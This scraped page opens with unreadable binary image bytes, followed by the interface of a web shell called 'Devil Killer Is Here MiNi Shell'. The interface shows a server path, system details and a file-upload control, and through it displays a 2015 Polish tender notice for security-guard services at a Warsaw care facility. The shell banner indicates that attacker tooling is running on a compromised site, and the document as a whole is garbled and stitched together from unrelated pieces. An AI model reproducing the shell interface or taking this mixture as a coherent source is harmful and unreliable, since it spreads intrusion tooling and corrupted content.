JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150210/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150210/17447-N-2015.html

<p class="kh_header"><b>Warszawa: Ochrona fizyczna mienia, budynków i osób w Stołecznym Centrum Opiekuńczo-Leczniczym Spółka z o.o. przy ul. Mehoffera 72/74,  03-131 Warszawa.</b><br>
<b>Numer ogłoszenia: 17447 - 2015; data zamieszczenia: 10.02.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Stołeczne Centrum Opiekuńczo-Lecznicze sp. z o.o. , ul. Mehoffera 72/74, 03-131 Warszawa, woj. mazowieckie, tel. 22 811 06 88, faks 22 811 06 88.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.zol.warszawa.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Ochrona fizyczna mienia, budynków i osób w Stołecznym Centrum Opiekuńczo-Leczniczym Spółka z o.o. przy ul. Mehoffera 72/74,  03-131 Warszawa..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa ochrony fizycznej mienia, budynków i osób rzecz Zamawiającego.
Przedmiot zamówienia podzielony został na dwa Pakiety: 
Pakiet 1: Całodobowa ochrona mienia, budynków i osób Zakładu Opiekuńczo - Leczniczego im. Sue Ryder przy ul. Mehoffera 72/74 w Warszawie.

I. Zakres zadań pracownika ochrony na terenie Zakładu Opiekuńczo - Leczniczego im. Sue Ryder w Warszawie przy ul. Mehoffera 72/74.
1.	Dyżur pełniony całodobowo 24h
2.	Obsługa recepcji i szatni.
3.	Monitorowanie zabezpieczeń elektronicznych, kontrola zabezpieczeń pomieszczeń, zwracanie uwagi na osoby obce przebywające na terenie obiektu oraz niedopuszczanie do kradzieży na terenie obiektu.
4.	Niedopuszczenie do wynoszenia i dewastacji urządzeń stanowiących wyposażenie obiektów Zamawiającego.
5.	Powiadomienie służb specjalistycznych oraz Członków Zarządu Spółki w przypadku zaistnienia zdarzeń losowych tj. pożar, awaria sieci wodociągowej, gazowej lub elektrycznej, włamanie lub wyłączenie systemu alarmowego.
6.	Dokładne przekazywanie dyżuru osobie przejmującej dyżur - np. sprawdzenie okien, bram wjazdowych i drzwi do pomieszczeń (muszą być zamknięte).
7.	Przestrzeganie wewnętrznych zarządzeń i regulaminów obowiązujących na terenie Zakładu Zamawiającego i przeszkolenie pracowników w tym zakresie.
8.	Dokładne prowadzenie książki osób odwiedzających pacjentów wg sporządzonego wzoru  przez Zamawiającego. 
9.	Szczególne zwracanie uwagi na osoby obce przebywające na terenie zakładu.
10.	Podejmowanie interwencji w stosunku do osób zakłócających porządek.
11.	Kontrola pojazdów samochodowych pod względem posiadania przepustek uprawniających do wjazdu na teren Zakładu.
12.	Kontrolowanie przepustek wyjść poza Zakład pacjentów.
13.	Rygorystyczne przestrzeganie listy pacjentów, którzy ze względu na stan zdrowia nie mogą opuszczać samodzielnie Zakładu.
14.	Sprawowanie kontroli nad terenem Zakładu.
15.	Codzienna kontrola ogrodzenia wokół Zakładu - czy nie uległ zniszczeniu. W przypadku zniszczenia natychmiastowe powiadomienie o zaistniałym fakcie swoich przełożonych oraz Zarządu Spółki. Odnotowanie w raporcie godziny obchodu.
16.	Sprawowanie kontroli i czuwanie nad bezpieczeństwem pacjentów oraz budynków znajdujących się na terenie Zakładu:
1) budynek główny,
2) pawilon IV,
3) pawilon V,
4) pawilon VI,
5) pawilon VII,
6) budynek administracyjny,
7) budynek odnowy biologicznej,
8) budynek kotłowni,
oraz
1.	Dostawa i montaż na czas obowiązywania umowy w pomieszczeniu kasowym i aptece następujących urządzeń:
a)	Centrali alarmowej zabezpieczającej niezależnie dwa pomieszczenia kasę i aptekę,
b)	Nadajnika,
c)	Pilotów antynapadowych szt. 2,
d)	Czujek w pomieszczeniach apteki szt. 6.
2.	Konserwacja dostarczonych instalacji i urządzeń systemu alarmowego zainstalowanych w pomieszczeniu Kasy i Apteki.
a)	sprawdzanie sprawności działania systemu alarmowego raz na kwartał przez okres obowiązywania umowy,
b)	potwierdzanie w dzienniku ( książce) wykonywanej konserwacji i innych uwag dotyczących stanu i obsługi systemu alarmowego,
c)	bezzwłoczne sprawdzenie przyczyny uruchomienia systemu alarmowego w pomieszczeniach Kasy i Apteki oraz odnotowanie zaistniałego faktu w Książce pełnienia dyżurów-ochrony
3.	Ochrona musi posiadać własny firmowy system łączności bezprzewodowej, niezbędny zwłaszcza w czasie dokonywanych obchodów w obiektach i na terenie Zakładu.
4.	Wykonawca ponosi odpowiedzialność materialną i prawną za powierzoną mu ochronę osób, obiektów i mienia oraz wszelkie szkody powstałe w wyniku nienależytego wykonania usługi.
5.	Wykonawca zapewni swoim pracownikom odpowiednią odzież roboczą ( logo firmy, napis ochrona).
6.	Zamykanie drzwi wejściowych w budynku Głównym o godz. 2200.
7.	Zamykanie drzwi od strony łącznika o godz. 2000.
8.	Zamykanie drzwi od kuchni o godz. 1800.
9.	Otwieranie bram wjazdowych oraz furtki.
10.	Włączanie oświetlenia na zewnątrz budynku o zmroku.
11.	Uprzejme traktowanie pacjentów oraz osób odwiedzających.
12.	Przyjmowanie pieczywa i mleka.

II. Wymagania personalne.
1.	Jeden agent ochrony - dyżur pełniony całodobowo.
2.	Zamawiający wymaga aby pracownik realizujący umowę był sprawny fizycznie o nienagannej kulturze i higienie osobistej oraz by posiadał umiejętność jazdy na rowerze.
3.	Zamawiający wymaga aby pracownicy ochrony mieli na wyposażeniu sprawny rower ze względu 

na duży teren Zakładu ( ZOL im. Sue Ryder ul. Mehoffera 72/74 - ok. 6 hektarów).
4.	Zamawiający nie wymaga od pracowników ochrony wyznaczonych do ochrony naszych obiektu posiadania licencji pracownika ochrony fizycznej.

Pakiet 2: Ochrona fizyczna mienia, budynków i osób Zakładu Opiekuńczo - Leczniczego 
 przy ul.  Szubińskiej 4 w Warszawie.
I. Zakres zadań .
1.	Ochrona świadczona będzie od poniedziałku do niedzieli oraz w święta od 6.00 do 20.00 śr. (14h).
2.	Obsługa recepcji i szatni.
3.	Monitorowanie zabezpieczeń elektronicznych, kontrola zabezpieczeń pomieszczeń, zwracanie uwagi na osoby obce przebywające na terenie obiektu oraz niedopuszczanie do kradzieży na terenie obiektu.
4.	Niedopuszczenie do wynoszenia i dewastacji urządzeń stanowiących wyposażenie obiektów Zamawiającego.
5.	Powiadomienie służb specjalistycznych oraz Członków Zarządu w przypadku zaistnienia zdarzeń losowych tj. pożar, awaria sieci wodociągowej, gazowej lub elektrycznej, włamanie lub wyłączenie systemu alarmowego.
6.	Dokładne przekazywanie dyżuru osobie przejmującej dyżur - np. sprawdzenie okien, bram wjazdowych i drzwi do pomieszczeń (muszą być zamknięte).
7.	Przestrzeganie wewnętrznych zarządzeń i regulaminów obowiązujących na terenie Zakładu Zamawiającego i przeszkolenie pracowników w tym zakresie.
8.	Dokładne prowadzenie książki osób odwiedzających pacjentów wg sporządzonego wzoru  przez Zamawiającego. 
9.	Szczególne zwracanie uwagi na osoby obce przebywające na terenie zakładu.
10.	Podejmowanie interwencji w stosunku do osób zakłócających porządek.
11.	Kontrola pojazdów samochodowych pod względem posiadania przepustek uprawniających do wjazdu na teren Zakładu.
12.	Kontrolowanie przepustek wyjść poza Zakład pacjentów.
13.	Rygorystyczne przestrzeganie listy pacjentów, którzy ze względu na stan zdrowia nie mogą opuszczać samodzielnie Zakładu.
14.	Sprawowanie kontroli i obejścia terenu Zakładu.
15.	Codzienna kontrola ogrodzenia wokół Zakładu - czy nie uległ zniszczeniu. Jeżeli są zauważone zmiany, natychmiastowe powiadomienie o zaistniałym fakcie swoich przełożonych oraz dyrekcji Zakładu. Odnotowanie w raporcie godziny obchody.
16.	Sprawowanie kontroli i czuwanie nad bezpieczeństwem pacjentów oraz budynków znajdujących się na terenie Zakładu.
17.	Ochrona musi posiadać własny firmowy system łączności bezprzewodowej, niezbędny zwłaszcza w czasie dokonywanych obchodów w obiektach i na terenie Zakładu.
18.	Wykonawca zapewni swoim pracownikom odpowiednią odzież roboczą ( logo firmy, napis ochrona).
19.	Wykonawca ponosi odpowiedzialność materialną i prawną za powierzoną mu ochronę osób, obiektów i mienia oraz wszelkie szkody powstałe w wyniku nienależytego wykonania usługi.
20.	Ochrona powierzonego mienia.
21.	Zamykanie drzwi wejściowych w budynku o godz. 2000.
22.	Otwieranie bram wjazdowych oraz furtki.
23.	Włączanie oświetlenia na zewnątrz budynku o zmroku.
24.	Uprzejme traktowanie pacjentów oraz osób odwiedzających.
25.	Przyjmowanie dostaw pieczywa i mleka.

II. Wymagania personalne.
1.	Jeden agent ochrony - dyżur pełniony w ZOL przy ul. Szubińskiej 4 (14h).
2.	Zamawiający wymaga aby pracownicy realizujący umowę byli sprawni fizycznie o nienagannej kulturze i higienie osobistej.
3.	Zamawiający nie wymaga od pracowników ochrony wyznaczonych do ochrony naszego obiektu posiadania licencji pracownika ochrony fizycznej. 

UWAGA
1. Zamawiający wymaga, aby na terenie miasta Warszawy Wykonawca zabezpieczył patrol interwencyjny, którego czas dojazdu wyniósłby nie więcej niż 10 minut, liczonych od momentu zgłoszenia telefonicznego.
2. Raz w miesiącu Zamawiający może na koszt Wykonawcy dokonać uruchomienia alarmu w celu sprawdzenia czasu reakcji grup interwencyjnych.
3.Zamawiający wymaga by Wykonawca wyznaczył kierownika koordynatora ochrony, który będzie pośrednikiem we wszystkich sprawach związanych z realizacją przedmiotu zamówienia oraz który wprowadzi pracowników na obiekt w obecności przedstawiciela Zamawiającego..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 01.10.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda wniesienia wadium w wysokości: 
Pakiet nr 1: 3.500,00 PLN
Pakiet nr 2: 2.500,00 PLN</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest wykazać, że posiada koncesję na prowadzenie działalności gospodarczej w zakresie usług ochrony osób i mienia, w zakresie wymaganym ustawą z dnia 22 sierpnia 1997 roku o ochronie osób i mienia (Dz. U. z 2005 roku, nr 145, poz. 1221 z późn. zm.).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Pakiet nr 1 
Wykonawca zobowiązany jest wykazać, że wykonał (rozpoczął i zakończył) lub wykonuje (rozpoczął i aktualnie realizuje) w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej dwie usługi ochrony osób i mienia, odpowiadające swoim rodzajem i wartością usłudze będącej przedmiotem zamówienia. Poprzez zamówienie o charakterze i złożoności porównywalnej z przedmiotem zamówienia należy rozumieć realizację usługi o wartości nie mniejszej niż 70.000,00 zł brutto na okres 1 roku świadczenia usługi;
Pakiet nr 2 
Wykonawca zobowiązany jest wykazać, że wykonał (rozpoczął i zakończył) lub wykonuje (rozpoczął i aktualnie realizuje) w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej dwie usługi ochrony osób i mienia, odpowiadające swoim rodzajem i wartością usłudze będącej przedmiotem zamówienia. Poprzez zamówienie o charakterze i złożoności porównywalnej z przedmiotem zamówienia należy rozumieć realizację usługi o wartości nie mniejszej niż 40.000,00 zł brutto na okres 1 roku świadczenia usługi;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a) Wykonawca zobowiązany jest wykazać, że dysponuje patrolem interwencyjnym - w skład patrolu wchodzi minimum 1 osoba, na terenie miasta Warszawa którego czas dojazdu wyniósłby nie więcej niż 10 minut, liczonych od momentu zgłoszenia telefonicznego.
b) Wykonawca zobowiązany jest wykazać, iż przydzielony szef ochrony/koordynator posiada  co najmniej 2-letni staż pracy w tożsamy z przedmiotem zamówienia oraz że posiada  wykształcenie minimum średnie. Osoba zatrudniona na podstawie umowy o pracę.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest wykazać, iż jest ubezpieczony od
odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z
przedmiotem zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Inne dokumenty o których mowa w SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Doświadczenie - 10</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.zol.warszawa.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Stołeczne Centrum Opiekuńczo - Leczniczym Spółka z o.o. ul. Mehoffera 72/74, 03-131 Warszawa..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.02.2015 godzina 10:00, miejsce: Stołeczne Centrum Opiekuńczo - Leczniczym Spółka z o.o. ul. Mehoffera 72/74, 03-131 Warszawa..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
